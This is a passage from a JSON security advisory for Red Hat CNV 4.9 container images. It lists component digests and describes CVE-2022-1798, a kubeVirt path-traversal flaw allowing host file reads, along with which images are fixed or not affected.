"name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64"
},
"product_reference": "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64"
},
"product_reference": "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64"
},
"product_reference": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64"
},
"product_reference": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64"
},
"product_reference": "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64"
},
"product_reference": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64"
},
"product_reference": "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64"
},
"product_reference": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64"
},
"product_reference": "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64"
},
"product_reference": "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64"
},
"product_reference": "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64"
},
"product_reference": "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64"
},
"product_reference": "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64"
},
"product_reference": "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64"
},
"product_reference": "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64"
},
"product_reference": "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64"
},
"product_reference": "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64"
},
"product_reference": "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64"
},
"product_reference": "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64"
},
"product_reference": "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64"
},
"product_reference": "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64"
},
"product_reference": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
}
]
},
"vulnerabilities": [
{
"acknowledgments": [
{
"names": [
"Oliver Brooks and James Klopchic"
],
"organization": "NCC Group"
}
],
"cve": "CVE-2022-1798",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2022-08-12T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.9:container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64",
"8Base-CNV-4.9:container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64",
"8Base-CNV-4.9:container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64",
"8Base-CNV-4.9:container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64",
"8Base-CNV-4.9:container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64",
"8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64",
"8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64",
"8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64",
"8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64",
"8Base-CNV-4.9:container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64",
"8Base-CNV-4.9:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64",
"8Base-CNV-4.9:container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64",
"8Base-CNV-4.9:container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64",
"8Base-CNV-4.9:container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64",
"8Base-CNV-4.9:container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64",
"8Base-CNV-4.9:container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64",
"8Base-CNV-4.9:container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64",
"8Base-CNV-4.9:container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64",
"8Base-CNV-4.9:container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64",
"8Base-CNV-4.9:container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64",
"8Base-CNV-4.9:container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64",
"8Base-CNV-4.9:container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64",
"8Base-CNV-4.9:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2117872"
}
],
"notes": [
{
"category": "description",
"text": "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64",
"8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64"
],
"known_not_affected": [
"8Base-CNV-4.9:container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64",
"8Base-CNV-4.9:container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64",
"8Base-CNV-4.9:container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64",
"8Base-CNV-4.9:container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64",
"8Base-CNV-4.9:container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64",
"8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64",
"8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64",
"8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64",
"8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64",
"8Base-CNV-4.9:container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64",
